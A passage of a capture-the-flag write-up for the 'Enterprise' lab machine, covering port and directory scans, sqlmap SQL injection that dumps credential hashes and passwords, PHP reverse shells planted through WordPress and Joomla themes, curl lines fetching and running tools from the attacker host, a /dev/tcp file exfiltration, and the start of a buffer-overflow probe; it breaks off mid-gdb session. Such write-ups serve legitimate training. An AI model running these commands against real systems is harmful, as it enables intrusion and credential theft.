+ 443/tcp open ssl/http Apache httpd 2.4.25 ((Ubuntu))
+ |_http-server-header: Apache/2.4.25 (Ubuntu)
+ |_http-title: Apache2 Ubuntu Default Page: It works
+ | ssl-cert: Subject: commonName=enterprise.local/organizationName=USS Enterprise/stateOrProvinceName=United Federation of Planets/countryName=UK
+ | Not valid before: 2017-08-25T10:35:14
+ |_Not valid after: 2017-09-24T10:35:14
+ |_ssl-date: TLS randomness does not represent time
+ | tls-alpn:
+ |_ http/1.1
+ 5355/tcp filtered llmnr
+ 8080/tcp open http Apache httpd 2.4.10 ((Debian))
+ |_http-generator: Joomla! - Open Source Content Management
+ | http-open-proxy: Potentially OPEN proxy.
+ |_Methods supported:CONNECTION
+ | http-robots.txt: 15 disallowed entries
+ | /joomla/administrator/ /administrator/ /bin/ /cache/
+ | /cli/ /components/ /includes/ /installation/ /language/
+ |_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
+ |_http-server-header: Apache/2.4.10 (Debian)
+ |_http-title: Home
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 23.47 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up 2 http services running on port 80 and 8080 so we dirbust them both :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → dirb http://10.10.10.61
+
+ -----------------
+ DIRB v2.22
+ By The Dark Raver
+ -----------------
+
+ START_TIME: Wed Mar 4 18:11:46 2020
+ URL_BASE: http://10.10.10.61/
+ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
+
+ -----------------
+
+ GENERATED WORDS: 4612
+
+ ---- Scanning URL: http://10.10.10.61/ ----
+ + http://10.10.10.61/server-status (CODE:403|SIZE:299)
+
+ ==> DIRECTORY: http://10.10.10.61/wp-admin/
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → dirb http://10.10.10.61:8080
+
+ -----------------
+ DIRB v2.22
+ By The Dark Raver
+ -----------------
+
+ START_TIME: Wed Mar 4 18:11:45 2020
+ URL_BASE: http://10.10.10.61:8080/
+ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
+
+ -----------------
+
+ GENERATED WORDS: 4612
+
+ ---- Scanning URL: http://10.10.10.61:8080/ ----
+ + http://10.10.10.61:8080/0 (CODE:200|SIZE:7678)
+ + http://10.10.10.61:8080/01 (CODE:200|SIZE:8286)
+ + http://10.10.10.61:8080/02 (CODE:200|SIZE:8595)
+ + http://10.10.10.61:8080/1 (CODE:200|SIZE:8285)
+ + http://10.10.10.61:8080/1x1 (CODE:200|SIZE:8287)
+ + http://10.10.10.61:8080/2 (CODE:200|SIZE:8594)
+ + http://10.10.10.61:8080/2g (CODE:200|SIZE:8595)
+ + http://10.10.10.61:8080/about (CODE:200|SIZE:8160)
+ + http://10.10.10.61:8080/About (CODE:200|SIZE:8160)
+ ==> DIRECTORY: http://10.10.10.61:8080/administrator/
+ ==> DIRECTORY: http://10.10.10.61:8080/bin/
+ ==> DIRECTORY: http://10.10.10.61:8080/cache/
+ ==> DIRECTORY: http://10.10.10.61:8080/components/
+
+
+So as our nmap scan picked up, we have wordpress running on port 80, and joomla running on port 8080 and investigating port 443 we get yet another webpage which is the default apache successful installation page
+
+Now dirbusting a https is long and tedious but we find the /files directory nonetheless :
+
+
+
+so we download it locally (wget --no-check-certificate) and try to unzip it :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → wget https://10.10.10.61/files/lcars.zip --no-check-certificate
+ --2020-03-05 06:26:20-- https://10.10.10.61/files/lcars.zip
+ Connecting to 10.10.10.61:443... connected.
+ WARNING: The certificate of ‘10.10.10.61’ is not trusted.
+ WARNING: The certificate of ‘10.10.10.61’ doesn't have a known issuer.
+ WARNING: The certificate of ‘10.10.10.61’ has expired.
+ The certificate has expired
+ The certificate's owner does not match hostname ‘10.10.10.61’
+ HTTP request sent, awaiting response... 200 OK
+ Length: 1406 (1.4K) [application/zip]
+ Saving to: ‘lcars.zip’
+
+ lcars.zip 100%[===============================================>] 1.37K --.-KB/s in 0s
+
+ 2020-03-05 06:26:21 (14.0 MB/s) - ‘lcars.zip’ saved [1406/1406]
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → unzip lcars.zip
+ Archive: lcars.zip
+ inflating: lcars/lcars_db.php
+ inflating: lcars/lcars_dbpost.php
+ inflating: lcars/lcars.php
+
+
+now looking at lcars_db.php we see a few interesting things :
+
+
+
+number one being the php script including a wordpress php config, located in /var/www/html/wp-config.php which could possibly reveal additional information about the database being used, and at the bottom we see a sql query looking for the number (integer) of wp_post IDs which shows an apparent SQL Injection vulnerability, however because the $result variable is returning an array and whatever we try to inject won't be able to escape the echo statement.
+
+
+
+here the script is also using the /var/www/html/wp-config.php config, and preety much the same things as above but with 2 additional if statements which are additional checks against sql injections, however we see that whatever we try to query gets casted into integer type so we could write a simple python script, to try passing in numbers as query to inspect what information we can get from it.
+
+
+ import requests
+
+ url ="http://10.10.10.61/wp-content/plugins/lcars/lcars_dbpost.php?query="
+ for x in range(150):
+ tmp = url + str(x)
+ print(str(x),str(requests.get(tmp).text).strip())
+
+
+So once the python script saved, we execute it :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → nano script.py
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → python script.py
+ ('0', '')
+ ('1', 'Hello world!')
+ ('2', '')
+ ('3', 'Auto Draft')
+ ('4', 'Espresso')
+ ('5', 'Sandwich')
+ ('6', 'Coffee')
+ ('7', 'Home')
+ ('8', 'About')
+ ('9', 'Contact')
+ ('10', 'Blog')
+ ('11', 'A homepage section')
+ ('12', '')
+ ('13', 'enterprise_header')
+ ('14', 'Espresso')
+ ('15', 'Sandwich')
+ ('16', 'Coffee')
+ ('17', '')
+ ('18', '')
+ ('19', '')
+ ('20', '')
+ ('21', '')
+ ('22', '')
+ ('23', 'enterprise_header')
+ ('24', 'cropped-enterprise_header-1.jpg')
+ ('25', '')
+ ('26', '')
+ ('27', '')
+ ('28', '')
+ ('29', '')
+ ('30', 'Home')
+ ('31', '')
+ ('32', '')
+ ('33', '')
+ ('34', 'Yelp')
+ ('35', 'Facebook')
+ ('36', 'Twitter')
+ ('37', 'Instagram')
+ ('38', 'Email')
+ ('39', '')
+ ('40', 'Hello world!')
+ ('41', '')
+ ('42', '')
+ ('43', '')
+ ('44', '')
+ ('45', '')
+ ('46', '')
+ ('47', '')
+ ('48', '')
+ ('49', '')
+ ('50', '')
+ ('51', 'Stardate 49827.5')
+ ('52', 'Stardate 49827.5')
+ ('53', 'Stardate 50893.5')
+ ('54', 'Stardate 50893.5')
+ ('55', 'Stardate 52179.4')
+ ('56', 'Stardate 52179.4')
+ ('57', 'Stardate 55132.2')
+ ('58', 'Stardate 55132.2')
+ ('59', '')
+ ('60', '')
+ ('61', '')
+ ('62', '')
+ ('63', '')
+ ('64', '')
+ ('65', '')
+ ('66', 'Passwords')
+ ('67', 'Passwords')
+ ('68', 'Passwords')
+ ('69', 'YAYAYAYAY.')
+ ('70', 'YAYAYAYAY.')
+ ('71', 'test')
+ ('72', '')
+ ('73', '')
+ ('74', '')
+ ('75', '')
+ ('76', '')
+ ('77', '')
+ ('78', 'YAYAYAYAY.')
+ ('79', '')
+ ('80', '')
+ ('81', '')
+ ('82', '')
+ ('83', '')
+ ('84', '')
+ ('85', '')
+ ('86', '')
+ ('87', '')
+ ('88', '')
+ ('89', '')
+ ('90', '')
+ ('91', '')
+ ('92', '')
+ ('93', '')
+ ('94', '')
+ ('95', '')
+ ('96', '')
+ ('97', '')
+ ('98', '')
+ ('99', '')
+ ('100', '')
+
+
+even though the page has 5 posts, according to our results it has quite a few more, so maybe our script isn't all that great, for lcars_db.php we'll use sqlmap instead :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → sqlmap -u http://10.10.10.61/wp-content/plugins/lcars/lcars_db.php\?query\=1 --dbs
+ ___
+ __H__
+ ___ ___[.]_____ ___ ___ {1.4.2#stable}
+ |_ -| . [.] | .'| . |
+ |___|_ [(]_|_|_|__,| _|
+ |_|V... |_| http://sqlmap.org
+
+ [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
+
+ [*] starting @ 07:10:04 /2020-03-05/
+
+ [07:10:04] [INFO] testing connection to the target URL
+ [07:10:05] [INFO] checking if the target is protected by some kind of WAF/IPS
+ [07:10:05] [INFO] testing if the target URL content is stable
+ [07:10:05] [INFO] target URL content is stable
+ [07:10:05] [INFO] testing if GET parameter 'query' is dynamic
+ [07:10:06] [WARNING] GET parameter 'query' does not appear to be dynamic
+ [07:10:06] [WARNING] heuristic (basic) test shows that GET parameter 'query' might not be injectable
+ [07:10:06] [INFO] testing for SQL injection on GET parameter 'query'
+ [07:10:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
+ [07:10:08] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
+ [07:10:09] [INFO] GET parameter 'query' appears to be 'Boolean-based blind - Parameter replace (original value)' injectable (with --string="fatal")
+ [07:10:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
+ [07:10:13] [INFO] GET parameter 'query' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
+ it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
+ for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
+ [07:10:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
+ [07:10:48] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
+ [07:10:50] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
+ [07:10:52] [INFO] target URL appears to have 1 column in query
+ [07:10:53] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
+ [07:10:57] [INFO] target URL appears to be UNION injectable with 1 columns
+ GET parameter 'query' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
+ sqlmap identified the following injection point(s) with a total of 67 HTTP(s) requests:
+ ---
+ Parameter: query (GET)
+ Type: boolean-based blind
+ Title: Boolean-based blind - Parameter replace (original value)
+ Payload: query=(SELECT (CASE WHEN (5644=5644) THEN 1 ELSE (SELECT 2592 UNION SELECT 3911) END))
+
+ Type: error-based
+ Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+ Payload: query=1 AND (SELECT 9520 FROM(SELECT COUNT(*),CONCAT(0x716a7a7171,(SELECT (ELT(9520=9520,1))),0x716b627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+ ---
+ [07:11:02] [INFO] the back-end DBMS is MySQL
+ back-end DBMS: MySQL >= 5.0
+ [07:11:04] [INFO] fetching database names
+ [07:11:04] [INFO] retrieved: 'information_schema'
+ [07:11:05] [INFO] retrieved: 'joomla'
+ [07:11:05] [INFO] retrieved: 'joomladb'
+ [07:11:05] [INFO] retrieved: 'mysql'
+ [07:11:05] [INFO] retrieved: 'performance_schema'
+ [07:11:06] [INFO] retrieved: 'sys'
+ [07:11:06] [INFO] retrieved: 'wordpress'
+ [07:11:06] [INFO] retrieved: 'wordpressdb'
+ available databases [8]:
+ [*] information_schema
+ [*] joomla
+ [*] joomladb
+ [*] mysql
+ [*] performance_schema
+ [*] sys
+ [*] wordpress
+ [*] wordpressdb
+
+
+
+And we found a few databases !
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → sqlmap -u http://10.10.10.61/wp-content/plugins/lcars/lcars_db.php\?query\=1 -D wordpress -T wp_users -C user_login,user_pass,user_email --dump --hex --threads 5
+ ___
+ __H__
+ ___ ___[.]_____ ___ ___ {1.4.2#stable}
+ |_ -| . ["] | .'| . |
+ |___|_ [(]_|_|_|__,| _|
+ |_|V... |_| http://sqlmap.org
+
+ [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
+
+ [*] starting @ 07:59:46 /2020-03-05/
+
+ [...]
+
+
+ DB:wordpress
+
+ Table:wp_users
+ user : william.riker
+ pass : $P$BFf47EOgXrJB3ozBRZkjYcleng2Q.2.
+ email : william.riker@enterprise.htb
+
+ Table:wp_posts
+ I got 1 draft post including password list
+
+ Needed somewhere to put some passwords quickly
+ ZxJyhGem4k338S2Y
+ enterprisencc170
+ ZD3YxfnSjezg67JZ
+ u*Z14ru0p#ttj83zS6
+
+ DB: joomladb
+ prefix : edz2g
+
+ Command : sqlmap -u http://10.10.10.61/wp-content/plugins/lcars/lcars_db.php?query=1 -D joomladb -T edz2g_users -C username,password,email --dump --threads 10
+ Table : edz2g_users
+ +-----------------+--------------------------------------------------------------+--------------------------------+
+ | username | password | email |
+ +-----------------+--------------------------------------------------------------+--------------------------------+
+ | geordi.la.forge | $2y$10$cXSgEkNQGBBUneDKXq9gU.8RAf37GyN7JIrPE7us9UBMR9uDDKaWy | geordi.la.forge@enterprise.htb |
+ | Guinan | $2y$10$90gyQVv7oL6CCN8lF/0LYulrjKRExceg2i0147/Ewpb6tBzHaqL2q | guinan@enterprise.htb |
+ +-----------------+--------------------------------------------------------------+--------------------------------+
+
+ DB: mysql
+ user: joomladb | 2eb70fd4eb74f31283541aad4e83ab6e077bc0df MySQL4.1/MySQL5 : joomlapassword!
+ user: root | 95b8a7b0a041cf2011bea41db57315c603285253 MySQL4.1/MySQL5 : NCC-1701E
+ user:wordpressdb | 10c910bc9c2c46140dc275cb69dc6565de125630 MySQL4.1/MySQL5 : passwordwordpress
+
+
+From there, we have a few credentials to work with, let's try **william.riker:u*Z14ru0p#ttj83zS6** on the wordpress admin pannel :
+
+
+ λ root [ 10.10.14.11/23 ] [nihilist/_HTB/Enterprise]
+ → echo '10.10.10.61 enterprise.htb' >> /etc/hosts
+
+
+
+` 
+
+And we are logged in! now we move over to the themes tab to upload our reverse shell :
+
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → locate nihilist.php
+ /home/nihilist/_HTB/Bastard/nihilist.php
+ /home/nihilist/_HTB/Cronos/nihilist.php
+ /home/nihilist/_HTB/Haircut/nihilist.php
+ /home/nihilist/_HTB/Networked/nihilist.php.gif
+ /home/nihilist/_HTB/October/nihilist.php5
+ /home/nihilist/_HTB/Popcorn/nihilist.php
+ /home/nihilist/_HTB/Popcorn/nihilist.php.gif
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → cp /home/nihilist/_HTB/Popcorn/nihilist.php .
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → nano nihilist.php
+
+
+` 
+
+Once modified we move over to the 404.php file we modified containing our reverse shell :
+
+
+
+And trying to print out the user flag we get a troll, so we need to see what we have to do from here.
+
+
+ www-data@b8319d86d21e:/home$ hostname
+ hostname
+ b8319d86d21e
+ www-data@b8319d86d21e:/home$ ip addr
+ ip addr
+ 1: lo: <****LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
+ link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
+ inet 127.0.0.1/8 scope host lo
+ valid_lft forever preferred_lft forever
+ 8: eth0@if9: <****BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
+ link/ether 02:42:ac:11:00:04 brd ff:ff:ff:ff:ff:ff
+ inet 172.17.0.4/16 scope global eth0
+ valid_lft forever preferred_lft forever
+
+From here we see that the current box that we are on , logged in as www-data. we can move in /tmp, and download LinEnum to execute and see what we can do on the box
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → locate LinEnum.sh
+ /home/nihilist/_HTB/Cronos/LinEnum.sh
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → cp /home/nihilist/_HTB/Cronos/LinEnum.sh .
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → python -m SimpleHTTPServer 8080
+ Serving HTTP on 0.0.0.0 port 8080 ...
+
+
+
+ www-data@b8319d86d21e:/home$ cd /tmp && curl -O http://10.10.14.11:8080/LinEnum.sh && chmod +x LinEnum.sh && ./LinEnum.sh
+
+
+Looking at the results, we see that we are actually WITHIN a docker container, and somehow we have to break free from it. our current ip address within the box is 172.17.0.4/16 so let's see if we can ping any other ip address within this range :
+
+
+ www-data@b8319d86d21e:/home$ for x in $(seq 1 255); do ping -W 1 -c 1 172.17.0.$x | grep from; done
+ <$ for x in $(seq 1 255); do ping -W 1 -c 1 172.17.0.$x | grep from; done
+ 64 bytes from 172.17.0.1: icmp_seq=0 ttl=64 time=0.153 ms
+ 64 bytes from 172.17.0.2: icmp_seq=0 ttl=64 time=0.091 ms
+ 64 bytes from 172.17.0.3: icmp_seq=0 ttl=64 time=0.151 ms
+ 64 bytes from 172.17.0.4: icmp_seq=0 ttl=64 time=0.041 ms
+
+
+And looking at it, we seem to be able to ping 3 other ip addresses (172.17.0.4 being our docker container.) now running**which nc** we see that netcat isn't available for us, so we have to download a binary locally and then upload it using wget/SimpleHTTPServer like before
+
+
+ www-data@b8319d86d21e:/tmp$ curl -O http://10.10.14.11:8080/nc && chmod +x nc
+ curl -O http://10.10.14.11:8080/nc && chmod +x nc
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+ 100 35520 100 35520 0 0 34016 0 0:00:01 0:00:01 --:--:-- 34022
+ www-data@b8319d86d21e:/tmp$ ls -lash
+ ls -lash
+ total 128K
+ 4.0K drwxrwxrwt 3 root root 4.0K Mar 5 08:51 .
+ 4.0K drwxr-xr-x 73 root root 4.0K Sep 6 2017 ..
+ 4.0K drwxr-xr-x 2 www-data www-data 4.0K Sep 7 2017 .sam
+ 36K -rwxr-xr-x 1 www-data www-data 35K Mar 5 08:51 nc
+ 60K -rw------- 1 www-data www-data 58K Oct 16 2017 sess_09dc3ceeb2cec4020caf3d94f3001509
+ 4.0K -rw------- 1 www-data www-data 60 Sep 8 2017 sess_71faa5ea6f4f1d51294af6db00072edd
+ 4.0K -rw------- 1 www-data www-data 917 Sep 8 2017 sess_b9c02f197e1c999b859d36e1e1040a6e
+ 8.0K -rw------- 1 www-data www-data 7.2K Oct 17 2017 sess_c84f999fe96f763f1e5928bb1ded0eae
+ 4.0K -rw------- 1 www-data www-data 60 Oct 20 2017 sess_f4abe5392ffbb75a6ecb22dd4af8accc
+
+
+
+From there we can scan the 3 ip addresses we found earlier :
+
+
+ www-data@b8319d86d21e:/tmp$./nc -vz 172.17.0.1 1-65535 2>/dev/stdout | grep 'succeeded!'
+ Connection to 172.17.0.1 22 port [tcp/ssh] succeeded!
+ Connection to 172.17.0.1 80 port [tcp/http] succeeded!
+ Connection to 172.17.0.1 443 port [tcp/https] succeeded!
+ Connection to 172.17.0.1 5355 port [tcp/hostmon] succeeded!
+ Connection to 172.17.0.1 8080 port [tcp/http-alt] succeeded!
+ Connection to 172.17.0.1 32812 port [tcp/*] succeeded!
+
+ www-data@b8319d86d21e:/tmp$./nc -vz 172.17.0.2 1-65535 2>/dev/stdout | grep 'succeeded!'
+ Connection to 172.17.0.2 3306 port [tcp/mysql] succeeded!
+
+ www-data@b8319d86d21e:/tmp$./nc -vz 172.17.0.3 1-65535 2>/dev/stdout | grep 'succeeded!'
+ Connection to 172.17.0.3 80 port [tcp/http] succeeded!
+
+
+
+Unfortunately we don't get to be able to do much more from here, so let's try and see what we can do from the joomla service running on port 8080 using the credentials we found earlier :
+
+
+ ZD3YxfnSjezg67JZ:geordi.la.forge
+ ZxJyhGem4k338S2Y:Guinan
+
+
+`  
+
+Once we are logged in , we go ahead and upload a php reverse shell, just like for the wordpress service by editing a php file :
+
+Extensions > Templates > Templates > Protostar
+
+ 
+
+Save the modified php file, and hit preview to execute the infected php file :
+
+
+
+And we seem to get into yet another docker container, this time as the 172.17.0.3
+
+
+ 172.17.0.1 (Host machine)
+ 172.17.0.3 (Joomla)
+ 172.17.0.4 (Wordpress)
+
+
+From there we can probably guess that **172.17.0.2** is the mysql server.
+
+
+ www-data@a7018bfdc454:/home$ mount -l
+ mount -l
+
+ [...]
+
+ **/dev/mapper/enterprise--vg-root on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro,data=ordered)
+ /dev/mapper/enterprise--vg-root on /etc/hostname type ext4 (rw,relatime,errors=remount-ro,data=ordered)
+ /dev/mapper/enterprise--vg-root on /etc/hosts type ext4 (rw,relatime,errors=remount-ro,data=ordered)
+ /dev/mapper/enterprise--vg-root on /var/www/html type ext4 (rw,relatime,errors=remount-ro,data=ordered)
+ /dev/mapper/enterprise--vg-root on /var/www/html/files type ext4 (rw,relatime,errors=remount-ro,data=ordered)**
+ proc on /proc/bus type proc (ro,relatime)
+ proc on /proc/fs type proc (ro,relatime)
+ proc on /proc/irq type proc (ro,relatime)
+ proc on /proc/sys type proc (ro,relatime)
+ proc on /proc/sysrq-trigger type proc (ro,relatime)
+ tmpfs on /proc/kcore type tmpfs (rw,nosuid,size=65536k,mode=755)
+ tmpfs on /proc/timer_list type tmpfs (rw,nosuid,size=65536k,mode=755)
+ tmpfs on /proc/timer_stats type tmpfs (rw,nosuid,size=65536k,mode=755)
+ tmpfs on /proc/sched_debug type tmpfs (rw,nosuid,size=65536k,mode=755)
+ tmpfs on /sys/firmware type tmpfs (ro,relatime)
+
+ www-data@a7018bfdc454:/home$ cd /var/www/html/files
+ cd /var/www/html/files
+
+ www-data@a7018bfdc454:/var/www/html/files$ ls
+ ls
+ lcars.zip
+
+
+here we see that /var/www/html/files is mounted as the SAME /files directory we found on port 443 at the beginning
+
+
+
+Creating a quick file using the touch command, we see that we are effectively able to create files in the /files directory. so let's upload our reverse shell using curl just like the previous 2 times :
+
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+ connect to [10.10.14.11] from (UNKNOWN) [10.10.10.61] 54016
+ bash: cannot set terminal process group (1618): Inappropriate ioctl for device
+ bash: no job control in this shell
+ www-data@enterprise:/var/www/html/files$ cd /home
+ lcd /home
+ www-data@enterprise:/home$ s
+ ls
+ jeanlucpicard
+ www-data@enterprise:/home$ cd jeanlucpicard
+ cd jeanlucpicard
+ www-data@enterprise:/home/jeanlucpicard$ cat user.txt
+ cat user.txt
+ 08XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+and that's it ! we have the user flag.
+
+## **Part 3 : Getting Root Access**
+
+From there we go as usual into /tmp to upload and then execute LinEnum.sh, and looking at the results, we see that we have an interesting binary in /bin/lcars. so let's copy it locally :
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → nc -lp 9003 | base64 -d > lcars.binary && chmod +x lcars.binary
+
+
+` _Terminal 2:_
+
+
+ www-data@enterprise:/bin$ base64 lcars > /dev/tcp/10.10.14.11/9003
+ base64 lcars > /dev/tcp/10.10.14.11/9003
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → nc -lp 9003 | base64 -d > lcars.binary && chmod +x lcars.binary
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → ltrace ./lcars.binary
+ __libc_start_main(0x56588c91, 1, 0xffc87bc4, 0x56588d30 <****unfinished ...****>
+ setresuid(0, 0, 0, 0x56588ca8) = 0xffffffff
+ puts(""
+ ) = 1
+ puts(" _______ _______"... _______ _______ ______ _______
+ ) = 49
+ puts(" | | |_____|"... | | |_____| |_____/ |______
+ ) = 49
+ puts(" |_____ |_____ | |"... |_____ |_____ | | | \_ ______|
+ ) = 49
+ puts(""
+ ) = 1
+ puts("Welcome to the Library Computer "...Welcome to the Library Computer Access and Retrieval System
+
+ ) = 61
+ puts("Enter Bridge Access Code: "Enter Bridge Access Code:
+ ) = 27
+ fflush(0xf7f3fd80) = 0
+ fgets
+
+At this point, we have to give some user input, so let's try and see if there is a certain limit to this input to trigger a buffer overflow
+
+
+ fflush(0xf7f2ed80) = 0
+ fgets(AAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAa
+ "AAAAAAAA", 9, 0xf7f2e5c0) = 0xffa1ec17
+ strcmp("AAAAAAAA", "picarda1") = -1
+ puts("\nInvalid Code\nTerminating Consol"...
+ Invalid Code
+ Terminating Console
+
+ ) = 35
+ fflush(0xf7f2ed80) = 0
+ exit(0 <****no return ...>
+ +++ exited (status 0) +++
+
+and we see that we managed to trigger some kind of a BOF revealling "picarda1" so let's run it within gdb :
+
+
+ λ nihilist [ 80.215.152.250 ] [~/_HTB/Enterprise]
+ → gdb ./lcars.binary
+ GNU gdb (Debian 8.3.1-1) 8.3.1
+ Copyright (C) 2019 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-linux-gnu".
+ Type "show configuration" for configuration details.
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ Reading symbols from ./lcars.binary...
+ (No debugging symbols found in ./lcars.binary)
+ gdb-peda$ r
+ Starting program: /home/nihilist/_HTB/Enterprise/lcars.binary
+
+ _______ _______ ______ _______
+ | | |_____| |_____/ |______
+ |_____ |_____ | | | \_ ______|
+
+ Welcome to the Library Computer Access and Retrieval System
+
+ Enter Bridge Access Code:
+ picarda1
+
+ _______ _______ ______ _______
+ | | |_____| |_____/ |______
+ |_____ |_____ | | | \_ ______|
+
+ Welcome to the Library Computer Access and Retrieval System
+
+
+
+ LCARS Bridge Secondary Controls -- Main Menu:
+
+ 1. Navigation
+ 2. Ships Log
+ 3. Science
+ 4. Security
+ 5. StellaCartography
+ 6. Engineering
+ 7. Exit
+ Waiting for input:
+
+
+With the picarda1 password we gain access to some sort of a menu within the binary, choosing 4 and then typing something we arrive at something interesting :
+
+
+ 1. Navigation
+ 2. Ships Log
+ 3. Science
+ 4. Security
+ 5. StellaCartography
+ 6. Engineering
+ 7. Exit
+ Waiting for input:
+ 4
+ Disable Security Force Fields
+ Enter Security Override:
+
+ asd
+ Rerouting Tertiary EPS Junctions: asd[Inferior 1 (process 4645) exited normally]
+ Warning: not running
+
+ gdb-peda$ checksec
+ CANARY : disabled
+ FORTIFY : disabled
+ NX : disabled
+ PIE : ENABLED
+ RELRO : Partial
+
+ gdb-peda$ aslr
+ ASLR is OFF
+
+
+
+here we use checksec and see that NX and ASLR are both disabled. Back on the machine we check if ASLR is turned off as the binary says so :
+
+
+ www-data@enterprise:/bin$ cat /proc/sys/kernel/randomize_va_space
+ cat /proc/sys/kernel/randomize_va_space
+ 0
+
+
+and here it says 0 therefore ASLR is actually disabled.
+
+
+ gdb-peda$ r
+ Starting program: /home/nihilist/_HTB/Enterprise/lcars.binary
+
+ _______ _______ ______ _______
+ | | |_____| |_____/ |______
+ |_____ |_____ | | | \_ ______|
+
+ Welcome to the Library Computer Access and Retrieval System
+
+ Enter Bridge Access Code:
+ picarda1
+
+ _______ _______ ______ _______
+ | | |_____| |_____/ |______
+ |_____ |_____ | | | \_ ______|
+
+ Welcome to the Library Computer Access and Retrieval System
+
+
+
+ LCARS Bridge Secondary Controls -- Main Menu:
+
+ 1. Navigation
+ 2. Ships Log
+ 3. Science
+ 4. Security
+ 5. StellaCartography
+ 6. Engineering
+ 7. Exit
+ Waiting for input:
+ 4
+ Disable Security Force Fields
+ Enter Security Override:
